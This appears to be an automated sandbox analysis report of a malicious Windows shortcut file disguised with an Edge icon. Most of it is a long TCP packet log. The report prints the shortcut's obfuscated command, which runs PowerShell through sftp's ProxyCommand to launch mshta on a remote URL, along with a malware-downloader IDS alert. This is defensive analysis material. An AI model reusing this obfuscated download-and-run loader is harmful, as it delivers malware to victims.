                                                                                    File Content Preview:L..................F.@.. ......H.5..Vx.H.5..Vx.H.5...............................P.O. .:i.....+00.../C:\...................V.1......Y.C..Windows.@........T,*.Y.C..............................W.i.n.d.o.w.s.....Z.1......YHS..System32..B........T,*.YHS....r.
                                                                                    Icon Hash:72d282828e8d8dd5

                                                                                    General

                                                                                    Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\sftp.exe
                                                                                    Command Line Argument:-o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" .
                                                                                    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-17T08:38:25.141520+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.1049713172.67.140.151443TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 17, 2024 08:38:16.114033937 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:16.114079952 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:16.114516020 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:16.129875898 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:16.129906893 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.351670980 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.351771116 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.419492960 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.419522047 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.419902086 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.419969082 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.423419952 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.467329979 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.996790886 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.996864080 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.996886969 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.996936083 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.996936083 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.996949911 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.996977091 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.997001886 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:17.997009039 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:17.997041941 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.005223989 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.005274057 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.005319118 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.005356073 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.013634920 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.013679981 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.013719082 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.013756037 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.022144079 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.022202969 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.116436958 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.116513968 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.116534948 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.116583109 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.188860893 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.188920021 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.192565918 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.192606926 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.192698956 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.192739010 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.200498104 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.200562000 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.203416109 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.203475952 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.203520060 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.203563929 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.211433887 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.211491108 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.219211102 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.219285965 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.219296932 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.219347954 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.227077007 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.227144957 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.227269888 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.227313042 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.234787941 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.234847069 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.234853983 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.234894991 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.242618084 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.242680073 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.250530005 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.250582933 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.250653982 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.250695944 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.258323908 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.258378983 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.258389950 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.258436918 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.265316963 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.265377998 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.265419960 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.265461922 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.272284031 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.272347927 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.279196024 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.279253960 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.383402109 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.385629892 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.385679960 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.385762930 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.385777950 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.385823011 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.390705109 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.390784979 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.390810966 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.390971899 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.395639896 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.395725965 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.395761013 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.395803928 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.405216932 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.405349016 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.414015055 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.414091110 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.418415070 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.418497086 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.427272081 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.427403927 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.431679964 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.431747913 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.440402985 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.440469980 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.449105024 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.449182987 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.457920074 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.458003998 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.462292910 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.462368965 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.471025944 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.471098900 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.475475073 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.475554943 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.575407028 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.575488091 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.579912901 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.580007076 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.587192059 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.587272882 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.590595007 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.590668917 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.597271919 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.597345114 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.603786945 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.603863001 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.609951019 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.610032082 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.613003969 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.613081932 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.619296074 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.619366884 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.622314930 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.622375011 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.628597975 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.628664017 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.634644985 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.634715080 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.640866995 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.640944958 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.645401955 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.645464897 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.651547909 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.651616096 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.654659033 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.654723883 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.767931938 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.768141985 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.771305084 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.771405935 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.775947094 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.776055098 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.780575991 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.780674934 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.782994986 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.783073902 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.787472963 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.787583113 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.792006969 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.792093992 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.794253111 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.794339895 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.798767090 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.798854113 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.803354025 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.803446054 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.805666924 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.805732012 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.810298920 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.810416937 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.814734936 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.814842939 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.826174974 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.826188087 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.826232910 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.826318979 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.826347113 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.826360941 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.826385021 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.841001987 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.841023922 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.841128111 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.841155052 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.841200113 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.856897116 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.856916904 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.857110023 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.857136965 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.857182026 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.870847940 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.870867968 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.871049881 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.871079922 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.871123075 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.970104933 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.970130920 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.970257044 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.970279932 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.971642971 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.982580900 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.982604027 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.982681990 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.982698917 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.982733965 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.994143009 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.994163036 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.994261026 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:18.994283915 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:18.994610071 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:19.002268076 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:19.002319098 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:19.002357006 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:19.002358913 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:19.002407074 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:19.002656937 CET49707443192.168.2.10104.21.48.1
                                                                                    Dec 17, 2024 08:38:19.002676010 CET44349707104.21.48.1192.168.2.10
                                                                                    Dec 17, 2024 08:38:20.865794897 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:20.865829945 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:20.865916014 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:20.874464035 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:20.874483109 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.281637907 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.281764984 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:22.285182953 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:22.285192966 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.285474062 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.304769039 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:22.351339102 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.809704065 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.809730053 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.809796095 CET44349711188.245.211.225192.168.2.10
                                                                                    Dec 17, 2024 08:38:22.809945107 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:22.814589024 CET49711443192.168.2.10188.245.211.225
                                                                                    Dec 17, 2024 08:38:23.337433100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:23.337479115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:23.337564945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:23.338660002 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:23.338671923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:24.558872938 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:24.559082985 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:24.562089920 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:24.562108040 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:24.562439919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:24.565840960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:24.607331991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.141534090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.141597033 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.141629934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.141714096 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.141721964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.141746998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.141777992 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.149682045 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.149792910 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.149914980 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.149934053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.150710106 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.158137083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.166809082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.171736002 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.171763897 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.218875885 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.333502054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.337364912 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.337409973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.337450027 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.337470055 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.337536097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.345336914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.353329897 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.353380919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.353447914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.353471041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.353704929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.361402035 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.369239092 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.369292974 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.369319916 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.377248049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.377522945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.377541065 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.385230064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.387739897 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.387758970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.401149035 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.401194096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.401209116 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.401231050 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.401319027 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.408745050 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.416383982 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.416446924 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.416457891 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.416486979 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.416805983 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.424002886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.453176022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.453588963 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.453610897 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.500133991 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.525312901 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.527781963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.527856112 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.527870893 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.532663107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.532767057 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.532778978 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.542388916 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:25.542491913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:25.542510986 CET44349713172.67.140.151192.168.2.10
